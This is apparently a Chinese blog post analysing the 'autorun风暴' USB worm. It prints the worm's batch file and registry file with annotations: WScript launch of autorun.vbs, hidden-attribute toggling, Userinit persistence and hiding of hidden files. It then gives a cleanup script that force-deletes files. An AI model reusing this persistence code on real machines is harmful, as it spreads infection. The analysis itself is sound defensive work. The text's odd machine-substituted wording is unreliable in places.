症状:计算机里面出现一堆autorun为文件名称的文件,删除后出现找不到autorun.vbs的提示。我就打开当中的一个文件:Autorun.bat,内容例如以下:

@echo off  //不显示系统提示符
rem autorun风暴   //病毒名称:autorun风暴
if exist ./autorun.reg regedit /s ./autorun.reg  //假设存在该文件夹下的autoun.reg注冊表文件写入注冊表
if not "%1"=="" goto open   //注冊表文件导入成功,进入open标记处。
if exist autorun.vbs start WScript.exe autorun.vbs&exit  //假设存在autorun.vbs,则使用WScript.exe将VBS文件执行,然后退出。
if exist %SYSTEMROOT%/system32/autorun.vbs start WScript.exe %SYSTEMROOT%/system32/autorun.vbs&exit  //假设系统文件夹下的system32内有autorun.vbs,那么用WScript.exe执行VBS,然后退出。
exit  //退出
:open  //标记为open
if not "%1"=="Open" goto next  //假设open成功,进入next标记
start explorer ./   //開始当前文件夹
exit  // 退出
:next  //标记为netx
if not "%1"=="Over" goto :next2  //假设标记不成功,进入next2标记
if exist ./autorun.bin type ./autorun.bin >C:/autorun.txt&&exit   //假设当前文件夹存在Autorun.bin,将autorun.bin写入到C盘的autorun.txt文件,然后退出。
if exist %SYSTEMROOT%/system32/autorun.bin type %SYSTEMROOT%/system32/autorun.bin >c:/autorun.txt&&exit  //假设系统文件夹system32下存在Autorun.bin,将autorun.bin写入到C盘的autorun.txt文件,然后退出。
exit   //退出
:next2     //标记为next2
if "%1"=="-" attrib -s -a -h -r %2/autorun.*    //先标记全部autorun开头的文件为非系统、非仅仅读、非隐藏、非..文件
if "%1"=="+" attrib +s +a +h +r %2/autorun.*  //先标记全部autorun开头的文件为系统、仅仅读、隐藏、..文件
:end   //结束

文件二:Autorun.reg

Windows Registry Editor Version 5.00  //Windows 注冊表编辑器 5.00创建
autorun风暴   //autorun风暴
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon]
"Userinit"="userinit.exe,autorun.bat"   //在该条目下的userinit上加入一个autorun.bat运行文件。

[HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced]
"ShowSuperHidden"=dword:00000000     //不显示隐藏文件。

我倒,这个病毒还真有点搞笑,连杀毒说明书都写好了,只是,作者显然是个好学生,老师教的要写好凝视真的没错啊!

杀毒方法:

能够制作一个批处理文件来进行,内容例如以下:
@echo on
taskkill /im explorer.exe /f
taskkill /im wscript.exe
start reg add HKCU/SOFTWARE/Microsoft/Windows/CurrentVersion/EXplorer/Advanced /v ShowSuperHidden /t REG_DWORD /d 1 /f
start reg import kill.reg
del c:/autorun.* /f /q /as
del %SYSTEMROOT%/system32/autorun.* /f /q /as
del d:/autorun.* /f /q /as
del e:/autorun.* /f /q /as
del f:/autorun.* /f /q /as
你的盘符多就多写几个
start explorer.exe

运行它即可了。

autorun.vbs病毒的清除办法的更多相关文章

  1. crack.vbs病毒,优盘里所有文件全变成快捷方式

    去了一趟学校打印店,用优盘copy打印了点东西,当时在打印店电脑里打开优盘的时候里面就变成了快捷方式,但没怎么在意.回来之后在自己电脑上居然也这样了.网上一搜是中了crack.vbs病毒了.格式化优盘 ...

  2. VBS病毒实验

    实验目的 探讨VBS病毒实现原理,为更好的深入防御和查杀病毒 实验原理 VBS病毒发生机理 实验内容 编写简单VBS病毒,并实现功能,学习VBS病毒发生机理 实验环境描述 VPC1(虚拟PC) 操作系 ...

  3. lsass 病毒手动清除方法

    病毒症状进程里面有2个lsass.exe进程,一个是system的,一个是当前用户名的(该进程为病毒).双击D:盘打不开,只能通过右击选择打开来打开.用kaspersky扫描可以扫描出来,并且可以杀掉 ...

  4. 关于1KB病毒的清除

    以前中过很多次的1KB病毒,这种病毒来源一般都是U盘,就是去打印店插个U盘,回来插自己电脑发现U盘中毒了. 中毒特征就是根目录下的所有文件夹都变成快捷方式,都只有1KB大小,而根目录下的文件和压缩包不 ...

  5. Oracle 数据库勒索病毒 RushQL 处理办法

    处理办法来自Oracle 官方: https://blogs.oracle.com/cnsupport_news/%E5%AF%B9%E6%95%B0%E6%8D%AE%E5%BA%93%E7%9A% ...

  6. 转:Linux下随机10字符病毒的清除

    病毒表现:网络流量暴满,疯狂地向香港的一个IP发数据,同时在top里面表现为随机的10位字母的进程,看/proc里面的信息,则为ls,cd之类常见的命令,CPU利用率也在top之首.杀死该进程后,会再 ...

  7. VBS脚本病毒特点及如何防范3(转)

    5.Vbs病毒生产机的原理介绍 所谓病毒生产机就是指可以直接根据用户的选择产生病毒源代码的软件.在很多人看来这或许不可思议,其实对脚本病毒而言它的实现非常简单. 脚本语言是解释执行的.不需要编译,程序 ...

  8. android手机登录时遇到“QQ安全登录发现病毒”解决

    android手机作为开源系统非常容易感染病毒,有时候我们会经常遇到手机QQ登录时检测到app被感染,一般情况是由手机感染病毒所引起的,安装腾讯管家后只能检测病毒和卸载感染病毒的软件,不能清除病毒.解 ...

  9. U盘中的autorun.inf

    怎么删除u盘里的autorun.inf 如果U盘中毒,刚插进机子时按住SHIFT五秒,这样就可以跳过预读,这样防止了预读时把病毒感染到机子上,在U盘盘符上点右键,看看有没有“Auto”选项: 1.如果 ...

随机推荐

  1. Apple Watch 1.0 开发介绍 1.4 简介 使用iOS技术

    WatchKit extension可以使用iOS app同样的技术,但是由于他是extension,使用有些技术的时候会有限制,有些不推荐使用.下面是一些介绍以及什么时候使用什么技术: 有些需要权限 ...

  2. AFNetworking框架_上传文件或图像server

    的文本 XXXXXXXXXX在自己的论点更填写 - (void)uploadImageWithImage:(NSString *)imagePath { //上传其它所需參数 NSString *us ...

  3. jedis异常:NoSuchElementException: Timeout waiting for idle object

    项目发现网络环境:java.util.NoSuchElementException: Timeout waiting for idle object 问题原因:不应该在try中释放资源.而应该在fin ...

  4. Cloudera impala简单介绍及安装具体解释

    一.Impala简单介绍 Cloudera Impala对你存储在Apache Hadoop在HDFS,HBase的数据提供直接查询互动的SQL.除了像Hive使用同样的统一存储平台,Impala也使 ...

  5. C++学习笔记36 (模板的细节明确template specialization)和显式实例(template instantiation)

    C++有时模板很可能无法处理某些类型的. 例如: #include <iostream> using namespace std; class man{ private: string n ...

  6. 终结者:具体解释Nginx(一)

            相信非常多人都听过Nginx.这个小巧的东西能够和Apache及IIS相媲美. 那么它有什么作用呢?一句话.它是一个减轻Web应用server(如Tomcat)压力和实现Web应用se ...

  7. 泛泰A900 刷4.4中国民营TWRP2.7.1.1版本 支持自己主动识别移动版本号(世界上第一)

    因本人手上的A900S已砖, 所以临时弄不了ROM了. 先上传之前已经弄好的刷4.4专用的新版TWRP recovery 2.7.1.1  这个版本号是我自己定义的,为差别之前公布的2.7.0.0版( ...

  8. python 3.4.0 简单的print &#39;hello world&#39;,出错--SyntaxError: invalid syntax

    问题描写叙述: win7下安装的python 3.4.0版本号, 在命令行里写入简单的输出语句: print 'hello world' 然后enter,结果返回结果为: SyntaxError: i ...

  9. 用android LinearLayout和RelativeLayout实现精确布局(转)

    先明确几个概念的区别: padding margin都是边距的含义,关键问题得明白是什么相对什么的边距. padding是控件的内容相对控件的边缘的边距. margin是控件边缘相对父控件的边距. a ...

  10. HDU 4283 You are the one(间隔DP)

    标题效果: The TV shows such as You Are the One has been very popular. In order to meet the need of boys ...